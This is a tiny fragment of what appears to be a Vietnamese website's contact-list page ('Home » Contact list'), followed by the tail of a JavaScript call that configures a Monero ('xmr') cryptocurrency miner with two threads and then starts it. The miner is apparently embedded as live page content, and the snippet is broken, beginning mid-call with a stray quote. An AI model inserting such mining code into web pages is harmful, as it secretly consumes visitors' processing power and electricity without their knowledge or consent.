Trang chủ » Danh sách liên lạc
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();